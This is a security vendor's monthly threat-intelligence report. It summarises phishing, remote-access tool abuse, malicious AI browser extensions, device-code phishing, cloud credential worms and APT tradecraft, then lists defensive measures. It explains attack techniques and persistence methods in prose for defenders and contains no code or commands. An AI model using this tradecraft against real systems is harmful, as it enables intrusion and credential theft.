Securonix Threat Labs Monthly Intelligence Insights – May 2026

Authors: Dheeraj Kumar 

Introduction

The Monthly Intelligence Insights report provides a summary of top threats curated, monitored, and analyzed by Securonix Threat Labs in May 2026. The report also includes a synopsis of the threats, indicators of compromise (IoCs), tactics, techniques, and procedures (TTPs), and related tags. Each threat has a comprehensive summary from Threat Labs and search queries from the Threat Research team. For additional information on Threat Labs and related search queries used via Autonomous Threat Sweeper to detect the below-mentioned threats, refer to our Threat Labs home page. 

Last month, Securonix Autonomous Threat Sweeper identified and analyzed 4,188 TTPs and IoCs; identified 113 emerging threats; investigated 81 potential threats; and elevated 19 incidents. The top data sources swept against include IDS / IPS / UTM / Threat Detection, Data Loss Prevention, Endpoint Management Systems, and Email / Email Security. 

Executive Summary

• TAX#TRIDENT: Fake Indian tax assessment lures now support multiple execution paths: archive-to-installer, decoy-driven VBScript delivery, and PHP-looking endpoints returning script content for silent endpoint-management enrollment. 

• VENOMOUS#HELPER: SSA-themed phishing installs signed remote-access tooling with service persistence, SafeBoot registry survival, self-healing, operator-presence polling, and redundant access channels. 

• AI browser extension spyware: AI productivity extensions are being used as a privileged browser foothold to read email content, prompts, API keys, form data, browsing sessions, and search activity. 

• Device code phishing: Identity takeover is shifting toward legitimate device authorization flows, dynamic code generation, QR/PDF lures, and phishing-as-a-service offerings that make token theft easier to scale. 

• Compromised websites and ClickFix: DriveSurge-style infrastructure uses legitimate websites and traffic distribution systems to push fake browser updates or copy-paste command instructions to unsuspecting visitors. 

• Cloud credential worming: PCPJack-style tooling harvests cloud, container, developer, and application secrets while propagating through exposed control planes and vulnerable web services. 

• Modular espionage malware: Kazuar has evolved into a leader-coordinated ecosystem designed to keep most infected hosts silent while one elected node performs external communications. 

• APT tradecraft: Nimbus Manticore and Webworm show parallel movement toward trusted execution flows, public-service C2, proxy chaining, SEO poisoning, and AI-assisted malware development. 

Threat Overview

Securonix Threat Research Highlights                   (Originally published in May 2026) 

TAX#TRIDENT: Fake Tax Lures Expand Across Script, Archive, and Management-Agent Delivery: 

Securonix Threat Research tracks TAX#TRIDENT as an active fake Indian income-tax campaign that pivots across multiple delivery paths. The lure remains consistent - a tax assessment or penalty notice - but the route to execution changes across archive downloads, VBScript downloaders, and PHP-looking endpoints that actually return script content. 

Two branches converge on the same signed ClientSetup payload. After execution, the installer creates a hidden client tree, writes runtime configuration, installs service and driver persistence, launches a fake system-named client process from a non-standard directory, and starts long-lived outbound communications. A third branch changes the final payload by silently enrolling an endpoint-management agent after several script and cloud-hosted stages. 

Analyst Commentary: This campaign is notable because it reuses a believable tax lure while varying the delivery chain and final tooling, which makes narrow indicator based detection fragile. It matters because both the ClientSetup and UEMS branches can provide durable remote access under the cover of signed or enterprise looking software. The most likely near term evolution is additional lure domains, wrapper changes, and alternate staging paths that preserve the same endpoint control objective. This assessment would be strengthened by repeat observations of the same behavioral cluster across new infrastructure and weakened if future samples show isolated commodity misuse rather than coordinated reuse. 

Why It Matters: The campaign shows how a single lure theme can survive defensive blocking by changing wrappers, file names, staging hosts, and final payloads. Hash-only detection is brittle. The stronger approach is to detect the behavior chain: tax-themed access, script execution from user-writable folders, misleading file extensions, YTSysConfig creation, unexpected service/driver installation, and long-lived outbound sessions to uncommon ports. 

VENOMOUS#HELPER: Dual-RMM Phishing for Silent Remote Access: 

Securonix Threat Research analyzed VENOMOUS#HELPER as an SSA-themed phishing campaign that delivers signed remote-access tooling rather than obvious custom malware. The attack begins with a statement-themed lure, validates the victim through an email-harvesting page, and then pushes a packaged remote-access executable disguised as a government document. 

After the victim approves the initial prompt, the chain installs silently as an OS service. It establishes persistence through service registration, SafeBoot network registry entries, a self-healing watchdog, and redundant remote-access channels. Dynamic analysis also showed automated surveillance loops that run even without hands-on-keyboard activity. 

Analyst Commentary: This activity reflects a disciplined initial access operation designed to blend into legitimate administration workflows rather than rely on traditional malware. It matters because trusted remote management software can bypass signature based controls while giving operators persistent and interactive access with limited user visibility. The most likely next step is selective hands on keyboard activity when the victim appears idle, potentially followed by deeper discovery, credential abuse, or deployment of additional tooling. This assessment would be strengthened by evidence of post access operator commands or lateral movement and weakened if access remained limited to automated surveillance with no follow on intrusion. 

Why It Matters: This campaign illustrates a central challenge in modern intrusion detection: when the malware is a legitimate remote management tool, the only reliable evidence is behavior. Service creation from non-standard paths, SafeBoot persistence, repeated polling loops, hidden remote sessions, and renamed native binaries are more useful than static file reputation. 

Spyware Threat Developments             (Originally published in May 2026) 

High-Risk AI Browser Extensions:              

The spyware section highlights a growing risk: AI-branded browser extensions that market productivity features while gaining privileged access to email, AI prompts, browsing sessions, search behavior, and API keys. The analyzed set included 18 high-risk extensions spanning remote control, adversary-in-the-browser behavior, infostealing, search hijacking, brand impersonation, and spyware. 

These extensions do not need kernel-level malware to become dangerous. Browser permissions can allow content-script execution on all pages, decrypted page-content access through DOM observation, request interception before encryption, extension-scoped proxy routing, cookie access, and persistent identifiers that restore themselves after deletion. 

Analyst Commentary: This activity reflects a meaningful shift from conventional browser nuisanceware toward higher impact collection and control inside trusted user workflows. It matters because the browser now holds prompts, email content, authentication state and business context that can be captured without requiring traditional malware execution paths. The near term watchpoint is continued abuse of GenAI branding and features to justify excessive permissions and to increase adoption at scale. This assessment would be strengthened by evidence of broader enterprise targeting or active post compromise abuse, and weakened if additional review shows these cases were limited to isolated policy violations without sustained malicious operation. 

Why It Matters: AI prompts and assistant workflows frequently contain proprietary code, business plans, unreleased content, personal data, and credentials. A malicious extension sitting inside the browser can see that content before network security controls do. This creates an enterprise data exposure path that traditional endpoint and email controls may not fully cover. 

Phishing and Social Engineering Trends                         (Originally published in May 2026) 

Device Code Phishing: Identity Takeover Through Legitimate Authentication Flows: 

Device code phishing has moved from a niche technique to a rapidly expanding identity-takeover model. Attackers abuse the OAuth 2.0 device authorization grant by convincing users to copy a generated code into a legitimate device-login page. Once entered, the attacker receives tokens that can grant access to enterprise accounts and connected services. 

The key improvement in current campaigns is on-demand code generation. Older attacks suffered from short code-expiration windows. Newer kits generate the code only when the target clicks the lure, which makes the attack viable even if the user opens the message hours later. Delivery now includes URLs, QR codes, PDF attachments, compromised sender accounts, and document-themed landing pages. 

Analyst Commentary: This activity reflects a practical evolution in identity takeover rather than a niche tactic, because it blends trusted authentication workflows with scalable social engineering and token theft. It matters because it can enable account compromise, fraud, business email compromise, data exposure, and downstream intrusion even when users are trained to avoid traditional credential phishing. The near term watchpoint is broader adoption by existing phishing operators and continued reuse of similar kits, themes, and cloud hosted delivery chains. The assessment would be strengthened by additional victimology and confirmed post compromise outcomes, and weakened if adoption proves limited to a small set of low volume operators. 

Why It Matters: Device code phishing turns user trust in legitimate authentication flows against the organization. Phishing-resistant authentication helps, but it must be paired with policy controls that limit device-code flows, restrict consent, and detect unusual token grants. Users may believe they are completing a normal sign-in prompt because the final code entry occurs on a real identity portal. 

DriveSurge: Compromised Websites, ClickFix, and Fake Updates at Scale: 

DriveSurge is a threat actor operating as a large scale initial access and malware delivery service that compromises legitimate websites and silently redirects visitors through a traffic distribution system to fake browser update pages or ClickFix lures. The activity has been tied to thousands of compromised sites and uses layered infrastructure, obfuscated JavaScript injects, failover delivery paths, and victim profiling to deliver malware at scale. The operation has used the same zTDS based approach since at least 2025, with public reporting identifying active clustering and infrastructure expansion in recent months. 

The main risk is that ordinary visits to trusted websites can become an infection path, enabling downstream actors to gain initial access through highly believable social engineering and staged payload delivery. Immediate priorities are to hunt for unauthorized external script loads, clipboard hijacking behaviors, suspicious browser update prompts, and PowerShell or Terminal execution patterns tied to fake remediation steps, while strengthening website integrity monitoring and endpoint controls against multi stage malware delivery. 

Analyst Commentary: This activity matters because it industrializes initial access by combining compromised trusted websites, traffic shaping, and adaptable social engineering into a scalable delivery pipeline. The strongest assessment is that the actor is enabling downstream compromise rather than pursuing a single end goal, which increases exposure across many victim types at once. A key watchpoint is whether the infrastructure expands further into new lure formats, additional operating systems, or more pre-positioned domains before activation. This assessment would be strengthened by more observed victim follow-on intrusions and weakened if future activity shows the infrastructure is fragmented across unrelated operators. 

Why It Matters: This activity combines web compromise, social engineering, and payload distribution into a scalable access pipeline. The most important detection point may be the compromised website itself: external JavaScript loaded from unrelated infrastructure, encoded redirect snippets, and unusual update prompts are early indicators before endpoint infection occurs. 

Emerging Malware Families and Backdoor Operations                                  (Originally published in May 2026) 

PCPJack: Cloud Worming and Credential Theft at Scale: 

PCPJack is a credential theft framework built for exposed cloud and web infrastructure. It begins with a Linux shell bootstrapper that sets up a working directory, checks the host against an operator blocklist, removes rival artifacts, installs runtime dependencies, downloads Python modules, establishes persistence, and launches the orchestrator. 

The toolset focuses on credential theft and propagation rather than cryptocurrency mining. It steals environment files, config files, API keys, database credentials, SMTP secrets, SSH keys, service account tokens, secret-store data, and wallet files. It then attempts to spread through exposed management APIs, container control planes, in-memory data stores, document databases, ML cluster endpoints, and vulnerable web applications. 

Analyst Commentary: This activity is notable because it combines credential theft, internal propagation, and explicit removal of rival actor artifacts, which suggests a focused and operationally mature cloud intrusion set rather than opportunistic abuse alone. It matters because exposed cloud administration paths and weak secret handling can turn a single foothold into broad access across workloads, containers, and connected services. The most likely near-term development is continued expansion against exposed management surfaces and vulnerable web applications, especially where credential hygiene and service authentication remain weak. This assessment would be strengthened by additional victimology or confirmed post-compromise outcomes, and weakened by evidence that the tooling was limited to isolated testing or short-lived staging. 

Why It Matters: Cloud-focused malware does not need a miner to be monetizable. Secrets, API keys, SSH keys, service tokens, and application credentials are often more valuable because they can enable spam, fraud, extortion, resale, and downstream intrusion. The worm also shows why exposed management APIs and over-privileged service accounts are high-risk even when no sensitive application data is stored locally. 

Kazuar: From Backdoor to Modular Espionage Ecosystem 

Kazuar has evolved from a traditional backdoor into a modular, leader-coordinated espionage framework. Its architecture uses Kernel, Bridge, and Worker modules. The Kernel coordinates tasking, configuration, logging, and module interaction. The Bridge handles external C2. Worker modules perform operational tasks such as collection, keylogging, screenshots, recent document discovery, and reconnaissance. 

The most important architectural change is leadership election. Only one Kernel instance in an infected environment becomes the active leader and communicates externally. Other instances enter SILENT mode and coordinate internally through encrypted IPC. This sharply reduces visible outbound traffic while maintaining internal task distribution and resilience. 

Analyst Commentary: This activity reflects a mature espionage capability built for persistence, resilience, and low visibility rather than rapid disruption. It matters because the architecture can fragment telemetry across hosts and processes, increasing the chance that defenders dismiss related signals as isolated noise. A key watchpoint is whether similar leader based coordination and fallback communications appear in related intrusions against public sector and defense entities. The assessment would be strengthened by confirmed victimology breadth and observed operational deployment data, and weakened if these capabilities remain largely limited to laboratory or research visibility. 

Why It Matters: Kazuar demonstrates why single-sample malware detection is insufficient for state-grade tooling. The observable footprint is distributed across processes, IPC channels, filesystem staging, and intermittent egress. Defenders need correlation logic that can link low-confidence signals into an ecosystem-level detection. 

Nation-State and APT Activity                          (Originally published in May 2026) 

Nimbus Manticore: Rapid Adaptation During Geopolitical Conflict 

Nimbus Manticore, an IRGC affiliated threat actor also tracked as UNC1549, conducted a multi wave campaign targeting organizations in the aviation and software sectors across the United States, Europe, and the Middle East during the recent Iranian conflict and its aftermath. The operation used career themed lures, a trojanized Zoom installer, and a fake SQL Developer download site promoted through SEO poisoning, while abusing AppDomain hijacking, trusted signed components, scheduled task hijacking, and a new MiniFast backdoor to gain execution, persistence, and remote control. 

This activity shows a more adaptable and mature intrusion capability that can support espionage, data theft, and sustained access into strategically relevant organizations. Immediate priorities are to hunt for suspicious .NET application configuration changes, validate software download sources, review scheduled task modifications tied to legitimate installers, and monitor for unauthorized command execution, file transfer, and persistence behavior associated with staged loader chains. 

Analyst Commentary: This campaign reflects a meaningful step forward in operational flexibility, with Nimbus Manticore combining social engineering, stealthy execution paths, and broader victim acquisition methods to improve access opportunities against priority sectors. The use of a newer backdoor and search driven delivery increases the likelihood of both targeted and opportunistic compromise, which matters because it expands exposure beyond traditional phishing recipients. The key watchpoint is whether the actor continues scaling SEO poisoning and signed component abuse into additional sectors or regions. Evidence of repeatable follow on post compromise actions, wider sector coverage, or more standardized persistence tradecraft would strengthen this assessment, while isolated infections or limited command diversity would weaken it. 

Why It Matters: The actor is not relying on one delivery model. It shifts from phishing archives to installer abuse to search-driven fake downloads, while also improving backdoor development speed. Detection should focus on the execution chain: .config hijacking, user-profile update directories, scheduled task modification, suspicious DLL loads, and structured API tasking endpoints. 

Webworm: Proxy-Centric Espionage and Public-Service C2 

Webworm is a China aligned threat group active since at least 2022 that has shifted from earlier Asia-focused operations toward European government targets and at least one university in South Africa, while expanding its toolkit with stealthier backdoors and proxy infrastructure. Recent activity featured EchoCreep and GraphWorm for command and control over Discord and Microsoft Graph API, GitHub for malware staging, cloud storage abuse for configuration retrieval and exfiltration, and web application reconnaissance using directory and vulnerability scanning consistent with opportunistic intrusion development. 

The main implication is that affected organizations may face covert persistence, credential access, internal routing abuse, and staged data theft through trusted cloud services that can blend with normal traffic. Immediate priorities are to investigate for unauthorized use of Microsoft Graph and Discord related traffic patterns, review webmail and internet facing systems for exploitation paths including CVE-2017-7692, validate persistence points and scheduled tasks, and hunt for unapproved tunneling or proxy behavior across endpoints and network egress. 

Analyst Commentary: This activity reflects a maturing intrusion set built for stealth, flexibility, and sustained access rather than simple one host control. The abuse of common cloud and collaboration services for command and control and exfiltration raises the risk of delayed detection, especially where outbound web traffic is broadly trusted. A key watchpoint is whether the actor expands this model to additional cloud services or increases reliance on chained proxy infrastructure for deeper internal access. The assessment would be strengthened by corroborated victim-side evidence of initial access and lateral movement, and weakened if the observed tooling proves limited to a narrow subset of operations. 

Why It Matters: Webworm represents a broader espionage trend: operators reduce the visibility of custom C2 by hiding command traffic inside public APIs and by routing access through layered proxy networks. Blocking known malware hashes is not enough when the suspicious behavior is an unusual executable talking to a normally allowed cloud or collaboration API. 

Securonix Threat Labs Summary: 

Based on the threats observed during May 2026, Securonix Threat Labs recommends implementing the following defensive measures to strengthen security posture and mitigate potential risks. 

Identity and Access 

• Block device code flow where possible. Use conditional access or equivalent identity policy controls to block device authorization grants for users and applications that do not explicitly require them. 

• Restrict app consent. Disable user-driven consent for high-risk scopes and require administrator approval for new OAuth applications. 

• Hunt token anomalies. Correlate device-code events, new app grants, impossible travel, new user agents, and mailbox rule creation after authentication. 

• Revoke before reset. For suspected device-code compromise, revoke refresh tokens and app grants in addition to resetting passwords. 

Endpoint and Remote Access 

• Inventory approved remote access tools. Create an allowlist of sanctioned remote-support and administration tools, expected install paths, service names, owners, and egress destinations. 

• Detect service creation from user paths. Alert when services are created by executables launched from Downloads, temporary folders, Public Documents, or archive-extraction paths. 

• Monitor SafeBoot and recovery persistence. Treat new SafeBoot\Network entries, self-healing watchdogs, and recovery service changes as high-priority persistence events. 

• Hunt renamed native binaries. Detect copied or renamed system utilities such as wmic.exe.bak and download tools renamed with DLL-like names in user-writable directories. 

• Block unmanaged script chains. Restrict wscript.exe, cscript.exe, mshta-like execution, and native shell download commands from email, browser, and archive contexts. 

Browser and AI Governance 

• Move to extension allowlisting. Permit only approved extensions by ID and version. Block all-page access, debugger-like permissions, proxy changes, and request interception unless explicitly justified. 

• Inspect extension data flows. Log extension network destinations, long-lived WebSocket sessions, proxy configuration changes, and search-provider overrides. 

• Protect prompts and API keys. Treat AI prompts, model API keys, and assistant integrations as sensitive data. Add DLP coverage and vault API keys outside browser storage where feasible. 

• Train on browser-update and ClickFix lures. Users should not download browser updates from random sites or paste webpage-provided commands into terminals. 

Cloud and Workload Security 

• Close exposed management APIs. Remove internet exposure from container daemons, orchestration APIs, data stores, ML job APIs, and web admin panels unless explicitly required and authenticated. 

• Enforce instance metadata protections. Require hardened metadata access controls and least-privilege service accounts for workloads. 

• Rotate secrets after exposure. If credential theft is suspected, rotate API keys, SSH keys, service tokens, database passwords, and messaging credentials. Do not rely only on host cleanup. 

• Baseline public object storage and repository access. Alert on unusual endpoint processes retrieving tools, configuration files, or archives from public storage and repositories. 

Detection Engineering and Response 

• Prioritize process lineage. Correlate parent/child relationships from email clients, browsers, archives, scripting engines, service managers, and remote-access binaries. 

• Correlate endpoint, identity, browser, and cloud events. Many of this month’s campaigns move across those boundaries. Single-source alerts will miss the full chain. 

• Build periodic-behavior analytics. Near-fixed polling loops, long-lived C2 sessions, and repeated security posture checks are strong signals for remote access implants. 

• Validate complete containment. For dual-channel or modular intrusions, verify that all services, registry entries, scheduled tasks, browser extensions, tokens, cloud keys, and redundant C2 paths are removed. 

Outlook for the Months Ahead: 

• Device-code phishing will become a standard identity-theft option. Dynamic code generation, phishing-as-a-service kits, and user familiarity with legitimate sign-in prompts make this attack model easy to scale. 

• ClickFix and fake update delivery will continue expanding through compromised sites. The model monetizes trust in familiar websites and avoids classic attachment scanning by turning the user into the execution step. 

• Remote access tool abuse will remain a ransomware precursor pattern. Signed remote-access software reduces friction for attackers and gives them interactive access, file transfer, script execution, and persistence without obvious custom malware. 

• AI browser extension risk will rise with enterprise AI adoption. Extensions operate exactly where sensitive prompts, email content, and session data are visible. The more AI workflows move into the browser, the more valuable this attack surface becomes. 

• Cloud credential worms will target exposed control planes before deploying disruptive payloads. Secrets and tokens are easier to monetize and easier to reuse across environments than CPU cycles for mining. 

• APT groups will increase public-service C2 and proxy chaining. Public chat APIs, cloud file APIs, repositories, and object storage can blend into allowed traffic while supporting per-victim tasking and exfiltration. 

• AI-assisted malware development will shorten iteration cycles. Expect more variants with similar logic, verbose error handling, modular code, and rapid copycat implementation across threat families. 

For a full list of the search queries used on Autonomous Threat Sweeper for the threats detailed above, refer to ours Threat Labs home page. The page also references a list of relevant policies used by threat actors.  

We would like to hear from you. Please reach out to us at scia@securonix.com.  

Note: The TTPs when used in silo are prone to false positives and noise and should ideally be combined with other indicators mentioned. 

Contributors: Nitish Singh, Nikhil Kumar Chadha, and Tanmay Kumar